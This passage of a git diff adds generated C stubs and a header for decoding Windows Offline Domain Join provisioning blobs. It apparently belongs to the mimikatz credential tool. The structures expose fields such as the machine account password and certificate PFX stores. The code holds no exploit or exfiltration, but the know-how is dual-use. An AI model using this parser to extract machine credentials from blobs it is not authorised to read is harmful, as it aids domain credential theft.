+ 0x5b, 0x4c, 0x00, 0xb9, 0xff, 0x5b, 0x16, 0x03, 0x18, 0x00, 0x4b, 0x5c, 0x46, 0x5c, 0x04, 0x00, 0x04, 0x00, 0x12, 0x00, 0x6e, 0xff, 0x46, 0x5c, 0x0c, 0x00, 0x0c, 0x00, 0x12, 0x00, 0xbe, 0xff,
+ 0x46, 0x5c, 0x14, 0x00, 0x14, 0x00, 0x12, 0x00, 0x4a, 0xfc, 0x5b, 0x08, 0x08, 0x08, 0x08, 0x08, 0x08, 0x5b, 0x00,
+};
+#endif
+
+const RPC_CLIENT_INTERFACE ODJ___RpcClientInterface = { sizeof(RPC_CLIENT_INTERFACE), {{0x00000000, 0x0000, 0x0000, {0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}}, {0, 0}}, NDR_TSI_20, 0, 0, 0, 0, 0, 0x00000000 };
+RPC_BINDING_HANDLE ODJ__MIDL_AutoBindHandle;
+static const MIDL_TYPE_PICKLING_INFO __MIDL_TypePicklingInfo = {0x33205054, 0x3, 0, 0, 0,};
+const MIDL_STUB_DESC ODJ_StubDesc = { (void*)&ODJ___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &ODJ__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Dodj__MIDL_TypeFormatString, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0 };
+
+size_t PODJ_PROVISION_DATA_AlignSize(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType)
+{
+ return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType);
+}
+
+void PODJ_PROVISION_DATA_Encode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType)
+{
+ NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType);
+}
+
+void PODJ_PROVISION_DATA_Decode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType)
+{
+ NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType);
+}
+
+void PODJ_PROVISION_DATA_Free(handle_t _MidlEsHandle, PODJ_PROVISION_DATA* _pType)
+{
+ NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_PROVISION_DATA_Offset, _pType);
+}
+
+size_t POP_PACKAGE_PART_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType)
+{
+ return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType);
+}
+
+void POP_PACKAGE_PART_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType)
+{
+ NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType);
+}
+
+void POP_PACKAGE_PART_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType)
+{
+ NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType);
+}
+
+void POP_PACKAGE_PART_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART* _pType)
+{
+ NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_Offset, _pType);
+}
+
+size_t POP_PACKAGE_PART_COLLECTION_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType)
+{
+ return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType);
+}
+
+void POP_PACKAGE_PART_COLLECTION_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType)
+{
+ NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType);
+}
+
+void POP_PACKAGE_PART_COLLECTION_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType)
+{
+ NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType);
+}
+
+void POP_PACKAGE_PART_COLLECTION_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION* _pType)
+{
+ NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_PART_COLLECTION_Offset, _pType);
+}
+
+size_t POP_PACKAGE_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE* _pType)
+{
+ return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType);
+}
+
+void POP_PACKAGE_Encode(handle_t _MidlEsHandle, POP_PACKAGE* _pType)
+{
+ NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType);
+}
+
+void POP_PACKAGE_Decode(handle_t _MidlEsHandle, POP_PACKAGE* _pType)
+{
+ NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType);
+}
+
+void POP_PACKAGE_Free(handle_t _MidlEsHandle, POP_PACKAGE* _pType)
+{
+ NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_PACKAGE_Offset, _pType);
+}
+
+size_t PODJ_WIN7BLOB_AlignSize(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType)
+{
+ return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType);
+}
+
+void PODJ_WIN7BLOB_Encode(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType)
+{
+ NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType);
+}
+
+void PODJ_WIN7BLOB_Decode(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType)
+{
+ NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType);
+}
+
+void PODJ_WIN7BLOB_Free(handle_t _MidlEsHandle, PODJ_WIN7BLOB* _pType)
+{
+ NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + ODJ_WIN7BLOB_Offset, _pType);
+}
+
+size_t POP_JOINPROV2_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType)
+{
+ return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType);
+}
+
+void POP_JOINPROV2_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType)
+{
+ NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType);
+}
+
+void POP_JOINPROV2_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType)
+{
+ NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType);
+}
+
+void POP_JOINPROV2_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV2_PART* _pType)
+{
+ NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV2_PART_Offset, _pType);
+}
+
+size_t POP_JOINPROV3_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType)
+{
+ return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType);
+}
+
+void POP_JOINPROV3_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType)
+{
+ NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType);
+}
+
+void POP_JOINPROV3_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType)
+{
+ NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType);
+}
+
+void POP_JOINPROV3_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV3_PART* _pType)
+{
+ NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_JOINPROV3_PART_Offset, _pType);
+}
+
+size_t POP_POLICY_PART_AlignSize(handle_t _MidlEsHandle, POP_POLICY_PART* _pType)
+{
+ return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType);
+}
+
+void POP_POLICY_PART_Encode(handle_t _MidlEsHandle, POP_POLICY_PART* _pType)
+{
+ NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType);
+}
+
+void POP_POLICY_PART_Decode(handle_t _MidlEsHandle, POP_POLICY_PART* _pType)
+{
+ NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType);
+}
+
+void POP_POLICY_PART_Free(handle_t _MidlEsHandle, POP_POLICY_PART* _pType)
+{
+ NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_POLICY_PART_Offset, _pType);
+}
+
+size_t POP_CERT_PART_AlignSize(handle_t _MidlEsHandle, POP_CERT_PART* _pType)
+{
+ return NdrMesTypeAlignSize2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType);
+}
+
+void POP_CERT_PART_Encode(handle_t _MidlEsHandle, POP_CERT_PART* _pType)
+{
+ NdrMesTypeEncode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType);
+}
+
+void POP_CERT_PART_Decode(handle_t _MidlEsHandle, POP_CERT_PART* _pType)
+{
+ NdrMesTypeDecode2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType);
+}
+
+void POP_CERT_PART_Free(handle_t _MidlEsHandle, POP_CERT_PART* _pType)
+{
+ NdrMesTypeFree2(_MidlEsHandle, (PMIDL_TYPE_PICKLING_INFO)&__MIDL_TypePicklingInfo, &ODJ_StubDesc, ms2Dodj__MIDL_TypeFormatString + OP_CERT_PART_Offset, _pType);
+}
\ No newline at end of file
diff --git a/modules/rpc/kull_m_rpc_ms-odj.h b/modules/rpc/kull_m_rpc_ms-odj.h
new file mode 100644
index 0000000..4448db6
--- /dev/null
+++ b/modules/rpc/kull_m_rpc_ms-odj.h
@@ -0,0 +1,211 @@
+#pragma once
+#include "kull_m_rpc.h"
+#include
+
+extern const GUID GUID_JOIN_PROVIDER, GUID_JOIN_PROVIDER2, GUID_JOIN_PROVIDER3, GUID_CERT_PROVIDER, GUID_POLICY_PROVIDER;
+
+#define ODJ_WIN7_FORMAT 0x00000001 // The bytes contained in pBlob must contain a serialized ODJ_WIN7_BLOB structure
+#define ODJ_WIN8_FORMAT 0x00000002 // The bytes contained in pBlob must contain a serialized OP_PACKAGE structure
+
+typedef struct _ODJ_BLOB {
+ ULONG ulODJFormat;
+ ULONG cbBlob;
+ PBYTE pBlob;
+} ODJ_BLOB, * PODJ_BLOB;
+
+typedef struct _ODJ_PROVISION_DATA {
+ ULONG ulVersion; // 1
+ ULONG ulcBlobs;
+ PODJ_BLOB pBlobs;
+} ODJ_PROVISION_DATA, * PODJ_PROVISION_DATA;
+
+typedef struct _OP_BLOB {
+ ULONG cbBlob;
+ PBYTE pBlob;
+} OP_BLOB, * POP_BLOB;
+
+/* PartType
+GUID_JOIN_PROVIDER {631c7621-5289-4321-bc9e-80f843f868c3} Contains a serialized ODJ_WIN7_BLOB structure.
+GUID_JOIN_PROVIDER2 {57bfc56b-52f9-480c-adcb-91b3f8a82317} Contains a serialized OP_JOIN_PROV2_PART structure.
+GUID_JOIN_PROVIDER3 {fc0ccf25-7ffa-474a-8611-69ffe269645f} Contains a serialized OP_JOIN_PROV3_PART structure.
+GUID_CERT_PROVIDER {9c0971e9-832f-4873-8e87-ef1419d4781e} Contains a serialized OP_CERT_PART structure.
+GUID_POLICY_PROVIDER {68fb602a-0c09-48ce-b75f-07b7bd58f7ec} Contains a serialized OP_POLICY_PART structure.
+*/
+
+#define OPSPI_PACKAGE_PART_ESSENTIAL 0x00000001 // This package part is considered essential. If the consumer does not recognize this package part or fails to successfully process it, the overall operation must fail.
+
+typedef struct _OP_PACKAGE_PART {
+ GUID PartType;
+ ULONG ulFlags;
+ OP_BLOB Part;
+ OP_BLOB Extension; // Reserved for future use and MUST be set to all zeros.
+} OP_PACKAGE_PART, * POP_PACKAGE_PART;
+
+typedef struct _OP_PACKAGE_PART_COLLECTION {
+ ULONG cParts;
+ POP_PACKAGE_PART pParts;
+ OP_BLOB Extension;
+} OP_PACKAGE_PART_COLLECTION, * POP_PACKAGE_PART_COLLECTION;
+
+typedef struct _OP_PACKAGE {
+ GUID EncryptionType; // Reserved for future use and MUST be set to GUID_NULL.
+ OP_BLOB EncryptionContext; // Reserved for future use and MUST be set to all zeros.
+ OP_BLOB WrappedPartCollection; // An OP_BLOB structure that contains a serialized OP_PACKAGE_COLLECTION structure.
+ ULONG cbDecryptedPartCollection; // Reserved for future use and MUST be set to zero.
+ OP_BLOB Extension; // Reserved for future use and MUST be set to all zeros.
+} OP_PACKAGE, * POP_PACKAGE;
+
+typedef struct _ODJ_SID {
+ UCHAR Revision;
+ UCHAR SubAuthorityCount;
+ SID_IDENTIFIER_AUTHORITY IdentifierAuthority;
+ ULONG SubAuthority[ANYSIZE_ARRAY];
+} ODJ_SID, * PODJ_SID;
+
+typedef struct _ODJ_UNICODE_STRING {
+ USHORT Length;
+ USHORT MaximumLength;
+ PWSTR Buffer;
+} ODJ_UNICODE_STRING, * PODJ_UNICODE_STRING;
+
+typedef struct _ODJ_POLICY_DNS_DOMAIN_INFO {
+ ODJ_UNICODE_STRING Name;
+ ODJ_UNICODE_STRING DnsDomainName;
+ ODJ_UNICODE_STRING DnsForestName;
+ GUID DomainGuid;
+ PODJ_SID Sid;
+} ODJ_POLICY_DNS_DOMAIN_INFO;
+
+typedef struct _ODJ_WIN7BLOB {
+ wchar_t* lpDomain;
+ wchar_t* lpMachineName;
+ wchar_t* lpMachinePassword;
+ ODJ_POLICY_DNS_DOMAIN_INFO DnsDomainInfo;
+ DOMAIN_CONTROLLER_INFOW DcInfo;
+ DWORD Options;
+} ODJ_WIN7BLOB, * PODJ_WIN7BLOB;
+
+#define OP_JP2_FLAG_PERSISTENTSITE 0x00000001 // The site specified in lpSiteName MUST be considered the permanent site for the client.
+typedef struct _OP_JOINPROV2_PART {
+ DWORD dwFlags;
+ wchar_t* lpNetbiosName;
+ wchar_t* lpSiteName;
+ wchar_t* lpPrimaryDNSDomain;
+ DWORD dwReserved;
+ wchar_t* lpReserved;
+} OP_JOINPROV2_PART, * POP_JOINPROV2_PART;
+
+typedef struct _OP_JOINPROV3_PART {
+ DWORD Rid;
+ wchar_t* lpSid;
+} OP_JOINPROV3_PART, * POP_JOINPROV3_PART;
+
+typedef struct _OP_POLICY_ELEMENT {
+ wchar_t* pKeyPath;
+ wchar_t* pValueName;
+ ULONG ulValueType;
+ ULONG cbValueData;
+ PBYTE pValueData;
+} OP_POLICY_ELEMENT, * POP_POLICY_ELEMENT;
+
+typedef struct _OP_POLICY_ELEMENT_LIST {
+ wchar_t* pSource;
+ ULONG ulRootKeyId; // Contains the identifier of the root registry key; currently must be set to HKEY_LOCAL_MACHINE.
+ ULONG cElements;
+ POP_POLICY_ELEMENT pElements;
+} OP_POLICY_ELEMENT_LIST, * POP_POLICY_ELEMENT_LIST;
+
+typedef struct _OP_POLICY_PART {
+ ULONG cElementLists;
+ POP_POLICY_ELEMENT_LIST pElementLists;
+ OP_BLOB Extension; // Reserved for future use and must contain all zeros
+} OP_POLICY_PART, * POP_POLICY_PART;
+
+typedef struct _OP_CERT_PFX_STORE {
+ wchar_t* pTemplateName;
+ ULONG ulPrivateKeyExportPolicy;
+ wchar_t* pPolicyServerUrl;
+ ULONG ulPolicyServerUrlFlags;
+ wchar_t* pPolicyServerId;
+ ULONG cbPfx;
+ PBYTE pPfx;
+} OP_CERT_PFX_STORE, * POP_CERT_PFX_STORE;
+
+typedef struct _OP_CERT_SST_STORE {
+ ULONG StoreLocation;
+ wchar_t* pStoreName;
+ ULONG cbSst;
+ PBYTE pSst;
+} OP_CERT_SST_STORE, * POP_CERT_SST_STORE;
+
+typedef struct _OP_CERT_PART {
+ ULONG cPfxStores;
+ POP_CERT_PFX_STORE pPfxStores;
+ ULONG cSstStores;
+ POP_CERT_SST_STORE pSstStores;
+ OP_BLOB Extension;
+} OP_CERT_PART, * POP_CERT_PART;
+
+size_t POP_PACKAGE_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE * _pType);
+size_t PODJ_WIN7BLOB_AlignSize(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType);
+size_t POP_JOINPROV2_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType);
+size_t POP_JOINPROV3_PART_AlignSize(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType);
+size_t PODJ_PROVISION_DATA_AlignSize(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType);
+size_t POP_PACKAGE_PART_COLLECTION_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType);
+size_t POP_PACKAGE_PART_AlignSize(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType);
+size_t POP_CERT_PART_AlignSize(handle_t _MidlEsHandle, POP_CERT_PART * _pType);
+size_t POP_POLICY_PART_AlignSize(handle_t _MidlEsHandle, POP_POLICY_PART * _pType);
+
+void POP_PACKAGE_Encode(handle_t _MidlEsHandle, POP_PACKAGE * _pType);
+void POP_JOINPROV3_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType);
+void POP_JOINPROV2_PART_Encode(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType);
+void PODJ_WIN7BLOB_Encode(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType);
+void PODJ_PROVISION_DATA_Encode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType);
+void POP_PACKAGE_PART_COLLECTION_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType);
+void POP_PACKAGE_PART_Encode(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType);
+void POP_CERT_PART_Encode(handle_t _MidlEsHandle, POP_CERT_PART * _pType);
+void POP_POLICY_PART_Encode(handle_t _MidlEsHandle, POP_POLICY_PART * _pType);
+
+void POP_PACKAGE_Decode(handle_t _MidlEsHandle, POP_PACKAGE * _pType);
+void POP_JOINPROV3_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType);
+void PODJ_WIN7BLOB_Decode(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType);
+void POP_JOINPROV2_PART_Decode(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType);
+void PODJ_PROVISION_DATA_Decode(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType);
+void POP_PACKAGE_PART_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType);
+void POP_PACKAGE_PART_COLLECTION_Decode(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType);
+void POP_CERT_PART_Decode(handle_t _MidlEsHandle, POP_CERT_PART * _pType);
+void POP_POLICY_PART_Decode(handle_t _MidlEsHandle, POP_POLICY_PART * _pType);
+
+void POP_PACKAGE_Free(handle_t _MidlEsHandle, POP_PACKAGE * _pType);
+void POP_JOINPROV2_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV2_PART * _pType);
+void PODJ_WIN7BLOB_Free(handle_t _MidlEsHandle, PODJ_WIN7BLOB * _pType);
+void POP_JOINPROV3_PART_Free(handle_t _MidlEsHandle, POP_JOINPROV3_PART * _pType);
+void PODJ_PROVISION_DATA_Free(handle_t _MidlEsHandle, PODJ_PROVISION_DATA * _pType);
+void POP_PACKAGE_PART_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART * _pType);
+void POP_PACKAGE_PART_COLLECTION_Free(handle_t _MidlEsHandle, POP_PACKAGE_PART_COLLECTION * _pType);
+void POP_CERT_PART_Free(handle_t _MidlEsHandle, POP_CERT_PART * _pType);
+void POP_POLICY_PART_Free(handle_t _MidlEsHandle, POP_POLICY_PART * _pType);
+
+#define kull_m_rpc_DecodeODJ_PROVISION_DATA(/*PVOID */data, /*DWORD */size, /*PODJ_PROVISION_DATA **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) PODJ_PROVISION_DATA_Decode)
+#define kull_m_rpc_FreeODJ_PROVISION_DATA(/*PODJ_PROVISION_DATA **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) PODJ_PROVISION_DATA_Free)
+
+#define kull_m_rpc_DecodeODJ_WIN7BLOB(/*PVOID */data, /*DWORD */size, /*PODJ_WIN7BLOB **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) PODJ_WIN7BLOB_Decode)
+#define kull_m_rpc_FreeODJ_WIN7BLOB(/*PODJ_WIN7BLOB **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) PODJ_WIN7BLOB_Free)
+
+#define kull_m_rpc_DecodeOP_PACKAGE(/*PVOID */data, /*DWORD */size, /*POP_PACKAGE **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_PACKAGE_Decode)
+#define kull_m_rpc_FreeOP_PACKAGE(/*POP_PACKAGE **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_PACKAGE_Free)
+
+#define kull_m_rpc_DecodeOP_PACKAGE_PART_COLLECTION(/*PVOID */data, /*DWORD */size, /*POP_PACKAGE_PART_COLLECTION **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_PACKAGE_PART_COLLECTION_Decode)
+#define kull_m_rpc_FreeOP_PACKAGE_PART_COLLECTION(/*POP_PACKAGE_PART_COLLECTION **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_PACKAGE_PART_COLLECTION_Free)
+
+#define kull_m_rpc_DecodeOP_JOINPROV2_PART(/*PVOID */data, /*DWORD */size, /*POP_JOINPROV2_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_JOINPROV2_PART_Decode)
+#define kull_m_rpc_FreeOP_JOINPROV2_PART(/*POP_JOINPROV2_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_JOINPROV2_PART_Free)
+
+#define kull_m_rpc_DecodeOP_JOINPROV3_PART(/*PVOID */data, /*DWORD */size, /*POP_JOINPROV3_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_JOINPROV3_PART_Decode)
+#define kull_m_rpc_FreeOP_JOINPROV3_PART(/*POP_JOINPROV3_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_JOINPROV3_PART_Free)
+
+#define kull_m_rpc_DecodeOP_CERT_PART(/*PVOID */data, /*DWORD */size, /*POP_CERT_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_CERT_PART_Decode)
+#define kull_m_rpc_FreeOP_CERT_PART(/*POP_CERT_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_CERT_PART_Free)
+
+#define kull_m_rpc_DecodeOP_POLICY_PART(/*PVOID */data, /*DWORD */size, /*POP_POLICY_PART **/pObject) kull_m_rpc_Generic_Decode(data, size, pObject, (PGENERIC_RPC_DECODE) POP_POLICY_PART_Decode)
+#define kull_m_rpc_FreeOP_POLICY_PART(/*POP_POLICY_PART **/pObject) kull_m_rpc_Generic_Free(pObject, (PGENERIC_RPC_FREE) POP_POLICY_PART_Free)
\ No newline at end of file